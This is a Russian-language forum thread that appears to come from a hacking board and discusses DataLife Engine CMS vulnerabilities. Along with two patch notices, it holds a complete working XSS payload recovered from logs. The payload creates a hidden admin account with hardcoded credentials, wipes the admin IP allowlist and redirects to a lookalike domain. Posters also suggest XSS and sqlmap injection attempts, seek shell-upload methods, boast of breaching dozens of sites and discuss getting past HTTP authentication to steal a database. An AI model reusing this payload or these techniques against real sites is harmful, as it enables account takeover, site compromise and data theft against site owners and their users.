[ Обзор уязвимостей DataLife Engine ]

походу переменная $align

 

Думаю что если что то передать $align, то это может выльется в XSS атаку. я прав?
примерно:
[im*g=<script>alert('XSS');</script>]$url[im*g]

 

Будет ли правильно заменить:
if ($allign != "")
на
if (!empty($allign))

 

Есть определенный ресурс, на нем есть фотогалерея с возможностью поиска. При поиске <script>alert('xss')</script> выбивает mysql error 1064. Как можно раскрутить ?

Скрин с содержанием error'a- http://clip2net.com/s/3FNfdVk

 

По идее можно, sqlmap пробуй

 

Пробовал, не але... Есть еще варианты ?

 

Это дыра на многих сайтах есть или только на твоём?

 

Других сайтов с данным модулем не находил... Модуль фотогаллерея от "Клуб Админов".

 

Новая уязвимость

Проблема: Недостаточная фильтрация данных.

Ошибка в версии: 11.2 и ниже

Степень опасности: Высокая

Для исправления откройте файл: /engine/go.php и найдите:

Code:

$url = @str_replace ( "&", "&", $url );

ниже добавьте

Code:

$url = htmlspecialchars( $url, ENT_QUOTES, $config['charset'] );
$url = str_replace ( "&", "&", $url );

 

Смотрел логи некоторых сайтов, после base64 decode вышло

HTML:

"></a>

<code style='display: none;' id='LJKwqoiDHqewE'></code>
<script>
function A(){
var q;
try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){
q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q;
}
var rp="/";
var ul="petromadsss";
var up="d1478963D";
var um="[email protected]";
var objhttp=A();
objhttp.onreadystatechange = function()
{
    if (objhttp.readyState == 4)
    {
        var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ=='));
        var da=r.exec(objhttp.responseText)[2];
        r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp'));
        var dh=r.exec(objhttp.responseText)[2];
        objhttp.open("POST",rp+da+'?mod=editusers&action=list',true);
        objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
        objhttp.send('action=adduser&user_hash='+dh+'&mod=editusers&regusername='+ul+'&regpassword='+up+'&regemail='+um+'&reglevel=1');
        var objhttp2=A();
        objhttp2.onreadystatechange=function()
        {
            if(objhttp2.readyState==4)
            {
                var sd=document.getElementById('LJKwqoiDHqewE');
                sd.innerHTML=objhttp2.responseText.replace(/(<script)/i,'');
                var ael=sd.getElementsByTagName('*');
                var pd='';
                r=new RegExp(atob('XihzYXZlX2Nvbik='));
                for(var i=0;i<ael.length;i++)
                    if(r.test(ael[i].name))
                        pd=pd+ael[i].name+'='+encodeURIComponent(ael[i].value)+'&';
                pd=pd+'save_con[admin_allowed_ip]=&mod=options&action=dosavesyscon&user_hash='+dh;
                var objhttp3=A();
                objhttp3.open('POST',rp+da+'?mod=options&action=syscon',true);
                objhttp3.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
                objhttp3.send(pd);
                window.location.href = "http://g00gleapis.ru/81NJLH";
            }
        }
        objhttp2.open('GET',rp+da+'?mod=options&action=syscon',true);
        objhttp2.send(null);
    }

}
objhttp.open('GET', rp, true);
objhttp.send(null);
</script><a href="http://g00gleapis.ru/81NJLH

 

Ребята, нужен способ заливки шелла, версия 10.5, форум стоит Xenforo 1.5.14. Может кто чего подскажет? Могу подкинуть Dom XSS, способ для личного пользования нужен)

 

Баг фикс

Проблема: Недостаточная фильтрация данных в Jquery плагине Masha JS входящем в состав DLE.

Ошибка в версии: 11.3 и ниже

Степень опасности: Высокая

Для исправления скачайте и скопируйте на свой сервер патч: https://dle-news.ru/files/dle113_path.zip

После чего очистите кеш браузера, и кеш скрипта в админпанели. Данный патч предназначен для версии 11.3 и всех версий ниже 11.3.

 

Кто знает как использовать этот баг с Masha JS?

 

Это и сесть моя DOM XSS. Я при помощи этой баги слил пару десятков сайтов. Она обходит даже xss аудитор от гугла ласт версии. Можно сделать сценарий на получение админ аккаунта.

 

Получил группа админа через typograf,но админка защищена через окошко хттп авторизации.
Есть идеи,что можно сделать(брутфорс пароля не пойдет,т.к. пароль там довольно не простой)?Хотелось бы базу выкачать.Еще кстати .htaccess файлы почему-то скачиваются,можно ли как-то выехать на этом?

 

На сколько я знаю, это расшифренный метод авторизации. Введи туда логин и пароль от аккаунта с админ правами.

 

Я тоже сначала так подумал,но во-первых,данные не подходят,во-вторых,они проверяются бесконечно,не банит айпи,в-третьих,при отмене пишет не "Access Denied", а "401". =)

 

Ну тогда лезь через форум =)

 

Еще бы он у них был xD
Кстати говоря, для "быстрого редактирования" новости запрос делается в admin.php?
Я почему-то отредактировать новость не могу,после нажатия кнопки "Сохранить" ничего не происходит,хотя удалять могу =\

 

Никогда с таким не сталкивался. Сколько хоть юзеров там?